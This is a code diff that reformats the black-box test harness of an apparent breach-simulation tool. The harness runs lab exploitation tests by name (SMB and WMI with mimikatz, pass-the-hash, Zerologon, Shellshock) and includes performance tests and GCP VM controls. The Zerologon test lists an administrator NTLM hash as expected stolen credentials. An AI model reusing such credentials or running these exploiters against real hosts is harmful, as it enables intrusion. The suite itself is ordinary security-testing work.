analyzer = CommunicationAnalyzer(island_client,
IslandConfigParser.get_ips_of_targets(raw_config))
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
analyzer = CommunicationAnalyzer(
island_client, IslandConfigParser.get_ips_of_targets(raw_config)
)
log_handler = TestLogsHandler(
test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
)
ExploitationTest(
name=test_name,
island_client=island_client,
raw_config=raw_config,
analyzers=[analyzer],
timeout=timeout_in_seconds,
log_handler=log_handler).run()
log_handler=log_handler,
).run()
@staticmethod
def run_performance_test(performance_test_class, island_client,
config_template, timeout_in_seconds, break_on_timeout=False):
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
log_handler = TestLogsHandler(performance_test_class.TEST_NAME,
def run_performance_test(
performance_test_class,
island_client,
TestMonkeyBlackbox.get_log_dir_path())
analyzers = [CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))]
performance_test_class(island_client=island_client,
config_template,
timeout_in_seconds,
break_on_timeout=False,
):
raw_config = IslandConfigParser.get_raw_config(config_template, island_client)
log_handler = TestLogsHandler(
performance_test_class.TEST_NAME, island_client, TestMonkeyBlackbox.get_log_dir_path()
)
analyzers = [
CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))
]
performance_test_class(
island_client=island_client,
raw_config=raw_config,
analyzers=analyzers,
timeout=timeout_in_seconds,
log_handler=log_handler,
break_on_timeout=break_on_timeout).run()
break_on_timeout=break_on_timeout,
).run()
@staticmethod
def get_log_dir_path():
@ -138,7 +167,9 @@ class TestMonkeyBlackbox:
TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter")
def test_smb_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbMimikatz, "SMB_exploiter_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(
island_client, SmbMimikatz, "SMB_exploiter_mimikatz"
)
def test_smb_pth(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH")
@ -159,31 +190,42 @@ class TestMonkeyBlackbox:
TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter")
def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, Tunneling, "Tunneling_exploiter", 15 * 60)
TestMonkeyBlackbox.run_exploitation_test(
island_client, Tunneling, "Tunneling_exploiter", 15 * 60
)
def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, WmiMimikatz, "WMI_exploiter,_mimikatz")
TestMonkeyBlackbox.run_exploitation_test(
island_client, WmiMimikatz, "WMI_exploiter,_mimikatz"
)
def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH")
def test_zerologon_exploiter(self, island_client):
test_name = "Zerologon_exploiter"
expected_creds = ["Administrator",
expected_creds = [
"Administrator",
"aad3b435b51404eeaad3b435b51404ee",
"2864b62ea4496934a5d6e86f50b834a5"]
"2864b62ea4496934a5d6e86f50b834a5",
]
raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client)
analyzer = ZerologonAnalyzer(island_client, expected_creds)
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
log_handler = TestLogsHandler(
test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()
)
ExploitationTest(
name=test_name,
island_client=island_client,
raw_config=raw_config,
analyzers=[analyzer],
timeout=DEFAULT_TIMEOUT_SECONDS,
log_handler=log_handler).run()
log_handler=log_handler,
).run()
@pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
@pytest.mark.skip(
reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
)
def test_report_generation_performance(self, island_client, quick_performance_tests):
"""
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
@ -193,21 +235,21 @@ class TestMonkeyBlackbox:
and the Timing one which checks how long the report took to execute
"""
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(ReportGenerationTest,
island_client,
Performance,
timeout_in_seconds=10*60)
TestMonkeyBlackbox.run_performance_test(
ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60
)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
@pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.")
@pytest.mark.skip(
reason="Perfomance test that creates env from fake telemetries is faster, use that instead."
)
def test_map_generation_performance(self, island_client, quick_performance_tests):
if not quick_performance_tests:
TestMonkeyBlackbox.run_performance_test(MapGenerationTest,
island_client,
"PERFORMANCE.conf",
timeout_in_seconds=10*60)
TestMonkeyBlackbox.run_performance_test(
MapGenerationTest, island_client, "PERFORMANCE.conf", timeout_in_seconds=10 * 60
)
else:
LOGGER.error("This test doesn't support 'quick_performance_tests' option.")
assert False
@ -219,4 +261,6 @@ class TestMonkeyBlackbox:
MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run()
def test_telem_performance(self, island_client, quick_performance_tests):
TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance()
TelemetryPerformanceTest(
island_client, quick_performance_tests
).test_telemetry_performance()

View File

@ -2,7 +2,6 @@ import abc
class BasicTest(abc.ABC):
@abc.abstractmethod
def run(self):
pass

View File

@ -13,7 +13,6 @@ LOGGER = logging.getLogger(__name__)
class ExploitationTest(BasicTest):
def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler):
self.name = name
self.island_client = island_client
@ -48,18 +47,25 @@ class ExploitationTest(BasicTest):
self.log_success(timer)
return
sleep(DELAY_BETWEEN_ANALYSIS)
LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()))
LOGGER.debug(
"Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken())
)
self.log_failure(timer)
assert False
def log_success(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()))
LOGGER.info(
"{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken())
)
def log_failure(self, timer):
LOGGER.info(self.get_analyzer_logs())
LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name,
timer.get_time_taken()))
LOGGER.error(
"{} test failed because of timeout. Time taken: {:.1f} seconds.".format(
self.name, timer.get_time_taken()
)
)
def all_analyzers_pass(self):
analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
@ -73,7 +79,10 @@ class ExploitationTest(BasicTest):
def wait_until_monkeys_die(self):
time_passed = 0
while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE:
while (
not self.island_client.is_all_monkeys_dead()
and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE
):
sleep(WAIT_TIME_BETWEEN_REQUESTS)
time_passed += WAIT_TIME_BETWEEN_REQUESTS
LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed))

View File

@ -10,7 +10,6 @@ LOGGER = logging.getLogger(__name__)
class EndpointPerformanceTest(BasicTest):
def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient):
self.name = name
self.test_config = test_config
@ -21,8 +20,9 @@ class EndpointPerformanceTest(BasicTest):
endpoint_timings = {}
for endpoint in self.test_config.endpoints_to_test:
self.island_client.clear_caches()
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint,
SupportedRequestMethod.GET)
endpoint_timings[endpoint] = self.island_client.requests.get_request_time(
endpoint, SupportedRequestMethod.GET
)
analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings)
return analyzer.analyze_test_results()

View File

@ -3,7 +3,9 @@ from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
PerformanceTestWorkflow,
)
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@ -17,18 +19,22 @@ class MapGenerationTest(PerformanceTest):
TEST_NAME = "Map generation performance test"
def __init__(self, island_client, raw_config, analyzers,
timeout, log_handler, break_on_timeout):
def __init__(
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
):
self.island_client = island_client
exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client,
raw_config, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
exploitation_test = ExploitationTest(
MapGenerationTest.TEST_NAME, island_client, raw_config, analyzers, timeout, log_handler
)
performance_config = PerformanceTestConfig(
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
break_on_timeout=break_on_timeout,
)
self.performance_test_workflow = PerformanceTestWorkflow(
MapGenerationTest.TEST_NAME, exploitation_test, performance_config
)
def run(self):
self.performance_test_workflow.run()

View File

@ -2,8 +2,9 @@ from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
TelemetryPerformanceTestWorkflow,
)
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@ -19,14 +20,18 @@ class MapGenerationFromTelemetryTest(PerformanceTest):
def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
performance_config = PerformanceTestConfig(
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=MAP_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME,
break_on_timeout=break_on_timeout,
)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
MapGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
quick_performance_test,
)
def run(self):
self.performance_test_workflow.run()

View File

@ -4,10 +4,10 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
class PerformanceTest(BasicTest, metaclass=ABCMeta):
@abstractmethod
def __init__(self, island_client, raw_config, analyzers,
timeout, log_handler, break_on_timeout):
def __init__(
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
):
pass
@property

View File

@ -3,9 +3,13 @@ from typing import List
class PerformanceTestConfig:
def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta,
endpoints_to_test: List[str] = None, break_on_timeout=False):
def __init__(
self,
max_allowed_single_page_time: timedelta,
max_allowed_total_time: timedelta,
endpoints_to_test: List[str] = None,
break_on_timeout=False,
):
self.max_allowed_single_page_time = max_allowed_single_page_time
self.max_allowed_total_time = max_allowed_total_time
self.endpoints_to_test = endpoints_to_test

View File

@ -1,12 +1,15 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
EndpointPerformanceTest,
)
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
class PerformanceTestWorkflow(BasicTest):
def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig):
def __init__(
self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig
):
self.name = name
self.exploitation_test = exploitation_test
self.island_client = exploitation_test.island_client
@ -25,7 +28,9 @@ class PerformanceTestWorkflow(BasicTest):
self.exploitation_test.wait_for_monkey_process_to_finish()
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
performance_test = EndpointPerformanceTest(
self.name, self.performance_config, self.island_client
)
try:
if not self.island_client.is_all_monkeys_dead():
raise RuntimeError("Can't test report times since not all Monkeys have died.")

View File

@ -3,7 +3,9 @@ from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow
from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import (
PerformanceTestWorkflow,
)
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@ -13,25 +15,34 @@ REPORT_RESOURCES = [
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
"api/report/zero_trust/pillars",
]
class ReportGenerationTest(PerformanceTest):
TEST_NAME = "Report generation performance test"
def __init__(self, island_client, raw_config, analyzers,
timeout, log_handler, break_on_timeout):
def __init__(
self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout
):
self.island_client = island_client
exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client,
raw_config, analyzers, timeout, log_handler)
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
exploitation_test = ExploitationTest(
ReportGenerationTest.TEST_NAME,
island_client,
raw_config,
analyzers,
timeout,
log_handler,
)
performance_config = PerformanceTestConfig(
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME,
exploitation_test,
performance_config)
break_on_timeout=break_on_timeout,
)
self.performance_test_workflow = PerformanceTestWorkflow(
ReportGenerationTest.TEST_NAME, exploitation_test, performance_config
)
def run(self):
self.performance_test_workflow.run()

View File

@ -2,8 +2,9 @@ from datetime import timedelta
from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \
TelemetryPerformanceTestWorkflow
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import (
TelemetryPerformanceTestWorkflow,
)
MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2)
MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5)
@ -13,7 +14,7 @@ REPORT_RESOURCES = [
"api/attack/report",
"api/report/zero_trust/findings",
"api/report/zero_trust/principles",
"api/report/zero_trust/pillars"
"api/report/zero_trust/pillars",
]
@ -23,14 +24,18 @@ class ReportGenerationFromTelemetryTest(PerformanceTest):
def __init__(self, island_client, quick_performance_test, break_on_timeout=False):
self.island_client = island_client
performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
performance_config = PerformanceTestConfig(
max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME,
max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME,
endpoints_to_test=REPORT_RESOURCES,
break_on_timeout=break_on_timeout)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME,
break_on_timeout=break_on_timeout,
)
self.performance_test_workflow = TelemetryPerformanceTestWorkflow(
ReportGenerationFromTelemetryTest.TEST_NAME,
self.island_client,
performance_config,
quick_performance_test)
quick_performance_test,
)
def run(self):
self.performance_test_workflow.run()

View File

@ -5,39 +5,43 @@ from typing import Dict, List
from tqdm import tqdm
TELEM_DIR_PATH = './tests/performance/telem_sample'
TELEM_DIR_PATH = "./tests/performance/telem_sample"
MAX_SAME_TYPE_TELEM_FILES = 10000
LOGGER = logging.getLogger(__name__)
class SampleFileParser:
@staticmethod
def save_teletries_to_files(telems: List[Dict]):
for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)):
for telem in tqdm(telems, desc="Telemetries saved to files", position=3):
SampleFileParser.save_telemetry_to_file(telem)
@staticmethod
def save_telemetry_to_file(telem: Dict):
telem_filename = telem['name'] + telem['method']
telem_filename = telem["name"] + telem["method"]
for i in range(MAX_SAME_TYPE_TELEM_FILES):
if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))):
telem_filename = str(i) + telem_filename
break
with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file:
with open(path.join(TELEM_DIR_PATH, telem_filename), "w") as file:
file.write(json.dumps(telem))
@staticmethod
def read_telem_files() -> List[str]:
telems = []
try:
file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH)
if path.isfile(path.join(TELEM_DIR_PATH, f))]
file_paths = [
path.join(TELEM_DIR_PATH, f)
for f in listdir(TELEM_DIR_PATH)
if path.isfile(path.join(TELEM_DIR_PATH, f))
]
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
raise FileNotFoundError(
"Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them."
)
for file_path in file_paths:
with open(file_path, 'r') as telem_file:
with open(file_path, "r") as telem_file:
telem_string = "".join(telem_file.readlines()).replace("\n", "")
telems.append(telem_string)
return telems

View File

@ -8,7 +8,7 @@ class FakeIpGenerator:
def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]:
fake_ips = []
for i in range(len(real_ips)):
fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts))
fake_ips.append(".".join(str(part) for part in self.fake_ip_parts))
self.increment_ip()
return fake_ips

View File

@ -1,7 +1,8 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
FakeIpGenerator
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
class FakeMonkey:

View File

@ -6,24 +6,28 @@ from typing import Dict, List
from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
FakeIpGenerator
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
FakeMonkey,
)
TELEM_DIR_PATH = './tests/performance/telemetry_sample'
TELEM_DIR_PATH = "./tests/performance/telemetry_sample"
LOGGER = logging.getLogger(__name__)
class SampleMultiplier:
def __init__(self, multiplier: int):
self.multiplier = multiplier
self.fake_ip_generator = FakeIpGenerator()
def multiply_telems(self):
telems = SampleFileParser.get_all_telemetries()
telem_contents = [json.loads(telem['content']) for telem in telems]
telem_contents = [json.loads(telem["content"]) for telem in telems]
monkeys = self.get_monkeys_from_telems(telem_contents)
for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1):
for monkey in monkeys:
@ -40,46 +44,61 @@ class SampleMultiplier:
for monkey in monkeys:
if monkey.on_island:
continue
if (monkey.original_guid in telem['content'] or monkey.original_guid in telem['endpoint']) \
and not monkey.on_island:
telem['content'] = telem['content'].replace(monkey.original_guid, monkey.fake_guid)
telem['endpoint'] = telem['endpoint'].replace(monkey.original_guid, monkey.fake_guid)
if (
monkey.original_guid in telem["content"]
or monkey.original_guid in telem["endpoint"]
) and not monkey.on_island:
telem["content"] = telem["content"].replace(
monkey.original_guid, monkey.fake_guid
)
telem["endpoint"] = telem["endpoint"].replace(
monkey.original_guid, monkey.fake_guid
)
for i in range(len(monkey.original_ips)):
telem['content'] = telem['content'].replace(monkey.original_ips[i], monkey.fake_ips[i])
telem["content"] = telem["content"].replace(
monkey.original_ips[i], monkey.fake_ips[i]
)
@staticmethod
def offset_telem_times(iteration: int, telems: List[Dict]):
for telem in telems:
telem['time']['$date'] += iteration * 1000
telem["time"]["$date"] += iteration * 1000
def get_monkeys_from_telems(self, telems: List[Dict]):
island_ips = SampleMultiplier.get_island_ips_from_telems(telems)
monkeys = []
for telem in [telem for telem in telems
if 'telem_category' in telem and telem['telem_category'] == 'system_info']:
if 'network_info' not in telem['data']:
for telem in [
telem
for telem in telems
if "telem_category" in telem and telem["telem_category"] == "system_info"
]:
if "network_info" not in telem["data"]:
continue
guid = telem['monkey_guid']
guid = telem["monkey_guid"]
monkey_present = [monkey for monkey in monkeys if monkey.original_guid == guid]
if not monkey_present:
ips = [net_info['addr'] for net_info in telem['data']['network_info']['networks']]
ips = [net_info["addr"] for net_info in telem["data"]["network_info"]["networks"]]
if set(island_ips).intersection(ips):
on_island = True
else:
on_island = False
monkeys.append(FakeMonkey(ips=ips,
monkeys.append(
FakeMonkey(
ips=ips,
guid=guid,
fake_ip_generator=self.fake_ip_generator,
on_island=on_island))
on_island=on_island,
)
)
return monkeys
@staticmethod
def get_island_ips_from_telems(telems: List[Dict]) -> List[str]:
island_ips = []
for telem in telems:
if 'config' in telem:
island_ips = telem['config']['command_servers']
if "config" in telem:
island_ips = telem["config"]["command_servers"]
for i in range(len(island_ips)):
island_ips[i] = island_ips[i].replace(":5000", "")
return island_ips

View File

@ -1,19 +1,21 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \
FakeIpGenerator
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
class TestFakeIpGenerator(TestCase):
def test_fake_ip_generation(self):
fake_ip_gen = FakeIpGenerator()
self.assertListEqual([1, 1, 1, 1], fake_ip_gen.fake_ip_parts)
for i in range(256):
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1'])
self.assertListEqual(['1.1.2.1'], fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"])
self.assertListEqual(["1.1.2.1"], fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))
fake_ip_gen.fake_ip_parts = [256, 256, 255, 256]
self.assertListEqual(['256.256.255.256', '256.256.256.1'],
fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1', '1.1.1.2']))
self.assertListEqual(
["256.256.255.256", "256.256.256.1"],
fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1", "1.1.1.2"]),
)
fake_ip_gen.fake_ip_parts = [256, 256, 256, 256]
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(['1.1.1.1']))
self.assertRaises(Exception, fake_ip_gen.generate_fake_ips_for_real_ips(["1.1.1.1"]))

View File

@ -8,7 +8,9 @@ from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceA
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
LOGGER = logging.getLogger(__name__)
@ -17,7 +19,6 @@ MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=60)
class TelemetryPerformanceTest:
def __init__(self, island_client: MonkeyIslandClient, quick_performance_test: bool):
self.island_client = island_client
self.quick_performance_test = quick_performance_test
@ -27,29 +28,40 @@ class TelemetryPerformanceTest:
try:
all_telemetries = SampleFileParser.get_all_telemetries()
except FileNotFoundError:
raise FileNotFoundError("Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them.")
raise FileNotFoundError(
"Telemetries to send not found. "
"Refer to readme to figure out how to generate telemetries and where to put them."
)
LOGGER.info("Telemetries imported successfully.")
all_telemetries.sort(key=lambda telem: telem['time']['$date'])
all_telemetries.sort(key=lambda telem: telem["time"]["$date"])
telemetry_parse_times = {}
for telemetry in tqdm(all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"):
for telemetry in tqdm(
all_telemetries, total=len(all_telemetries), ascii=True, desc="Telemetries sent"
):
telemetry_endpoint = TelemetryPerformanceTest.get_verbose_telemetry_endpoint(telemetry)
telemetry_parse_times[telemetry_endpoint] = self.get_telemetry_time(telemetry)
test_config = PerformanceTestConfig(MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME)
test_config = PerformanceTestConfig(
MAX_ALLOWED_SINGLE_TELEM_PARSE_TIME, MAX_ALLOWED_TOTAL_TIME
)
PerformanceAnalyzer(test_config, telemetry_parse_times).analyze_test_results()
if not self.quick_performance_test:
self.island_client.reset_env()
def get_telemetry_time(self, telemetry):
content = telemetry['content']
url = telemetry['endpoint']
method = SupportedRequestMethod.__getattr__(telemetry['method'])
content = telemetry["content"]
url = telemetry["endpoint"]
method = SupportedRequestMethod.__getattr__(telemetry["method"])
return self.island_client.requests.get_request_time(url=url, method=method, data=content)
@staticmethod
def get_verbose_telemetry_endpoint(telemetry):
telem_category = ""
if "telem_category" in telemetry['content']:
telem_category = "_" + json.loads(telemetry['content'])['telem_category'] + "_" + telemetry['_id']['$oid']
return telemetry['endpoint'] + telem_category
if "telem_category" in telemetry["content"]:
telem_category = (
"_"
+ json.loads(telemetry["content"])["telem_category"]
+ "_"
+ telemetry["_id"]["$oid"]
)
return telemetry["endpoint"] + telem_category

View File

@ -1,12 +1,17 @@
from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import (
EndpointPerformanceTest,
)
from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import TelemetryPerformanceTest
from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import (
TelemetryPerformanceTest,
)
class TelemetryPerformanceTestWorkflow(BasicTest):
def __init__(self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test):
def __init__(
self, name, island_client, performance_config: PerformanceTestConfig, quick_performance_test
):
self.name = name
self.island_client = island_client
self.performance_config = performance_config
@ -15,10 +20,14 @@ class TelemetryPerformanceTestWorkflow(BasicTest):
def run(self):
try:
if not self.quick_performance_test:
telem_sending_test = TelemetryPerformanceTest(island_client=self.island_client,
quick_performance_test=self.quick_performance_test)
telem_sending_test = TelemetryPerformanceTest(
island_client=self.island_client,
quick_performance_test=self.quick_performance_test,
)
telem_sending_test.test_telemetry_performance()
performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client)
performance_test = EndpointPerformanceTest(
self.name, self.performance_config, self.island_client
)
assert performance_test.run()
finally:
if not self.quick_performance_test:

View File

@ -11,14 +11,21 @@ class GCPHandler(object):
MACHINE_STARTING_COMMAND = "gcloud compute instances start %s --zone=%s"
MACHINE_STOPPING_COMMAND = "gcloud compute instances stop %s --zone=%s"
def __init__(self, key_path="../gcp_keys/gcp_key.json", zone="europe-west3-a", project_id="guardicore-22050661"):
def __init__(
self,
key_path="../gcp_keys/gcp_key.json",
zone="europe-west3-a",
project_id="guardicore-22050661",
):
self.zone = zone
try:
# pass the key file to gcp
subprocess.call(GCPHandler.get_auth_command(key_path), shell=True) # noqa: DUO116
LOGGER.info("GCP Handler passed key")
# set project
subprocess.call(GCPHandler.get_set_project_command(project_id), shell=True) # noqa: DUO116
subprocess.call(
GCPHandler.get_set_project_command(project_id), shell=True
) # noqa: DUO116
LOGGER.info("GCP Handler set project")
LOGGER.info("GCP Handler initialized successfully")
except Exception as e:
@ -32,14 +39,18 @@ class GCPHandler(object):
"""
LOGGER.info("Setting up all GCP machines...")
try:
subprocess.call((GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True) # noqa: DUO116
subprocess.call(
(GCPHandler.MACHINE_STARTING_COMMAND % (machine_list, self.zone)), shell=True
) # noqa: DUO116
LOGGER.info("GCP machines successfully started.")
except Exception as e:
LOGGER.error("GCP Handler failed to start GCP machines: %s" % e)
def stop_machines(self, machine_list):
try:
